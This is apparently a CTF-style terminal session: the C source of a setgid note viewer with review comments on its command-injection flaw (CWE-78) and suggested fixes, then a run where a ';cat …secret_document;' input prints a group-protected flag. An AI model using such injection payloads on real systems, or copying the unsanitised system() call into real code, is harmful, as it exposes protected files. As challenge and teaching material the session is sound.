prob1@tmp-jinyong-server:~$ ls -l
합계 24
drwxr-xr-x 2 root root 4096 11월 29 08:49 notes
-rwxr-sr-x 1 root solved_prob1 8817 11월 29 08:06 prob1
-rw-r--r-- 1 root root 468 11월 29 08:06 prob1.c
-r--r----- 1 root solved_prob1 43 11월 29 08:50 secret_document
prob1@tmp-jinyong-server:~$ cat ./prob1.c
#include <stdio.h>
#include <string.h>
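/*
 * Challenge "Text Viewer": lists /home/prob1/notes/, reads a note name from
 * stdin, and displays that note by running /bin/cat through system().
 *
 * Security review (CWE-78, OS command injection): the name read from stdin is
 * copied unmodified into a command line that system() hands to the shell, so
 * any shell metacharacter in it (';', '|', '`', '$(...)') is interpreted as
 * shell syntax rather than as part of a file name. '/' and ".." are not
 * rejected either, so the name is also not confined to the notes directory.
 * In the transcript the binary is installed setgid (mode -rwxr-sr-x, group
 * solved_prob1), which is why the injected command can read a file that only
 * that group may open.
 *
 * Mitigation: do not build a shell command from input. Accept only names that
 * match a strict allowlist (for example letters, digits, '_' and '-'), then
 * open "<notes dir>/<name>.txt" directly with fopen() and copy it to stdout.
 * A privileged (setuid/setgid) program should not call system() at all.
 */
int main() {
    char cmd[256];
    char *note;
    size_t size;

    puts("Text Viewer");
    while(1) {
        /* With note == NULL and size == 0, getline() allocates a new buffer on
         * every pass; it is never freed, so each iteration leaks one line. */
        note = 0;
        size = 0;
        puts("Select note:");
        system("/bin/ls -al /home/prob1/notes/|/usr/bin/tail -n +4");
        /* The return value is not checked: end-of-file or a read error is not
         * detected and the loop has no exit path. */
        getline(&note, &size, stdin);
        if(strstr(note, "\n") != 0)
            *strstr(note, "\n") = 0; // remove newline
        printf("%s", note);
        /* Untrusted input reaches the command string here with no validation
         * or quoting; snprintf() only bounds the length (silent truncation). */
        snprintf(cmd, 256, "/bin/cat /home/prob1/notes/%s.txt", note);
        /* Injection sink: cmd is parsed by the shell, not passed as an argv. */
        system(cmd);
    }
    return 0;
}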
prob1@tmp-jinyong-server:~$ ./prob1
Text Viewer
Select note:
-rw-r--r-- 1 root root 8 11월 29 08:49 diary.txt
;cat /home/prob1/secret_document;
/bin/cat: /home/prob1/notes/: 디렉터리입니다
directory_traversal_flow_is_easy_to_attack
sh: 1: .txt: not found
;cat /home/prob1/secret_document;Select note:
-rw-r--r-- 1 root root 8 11월 29 08:49 diary.txt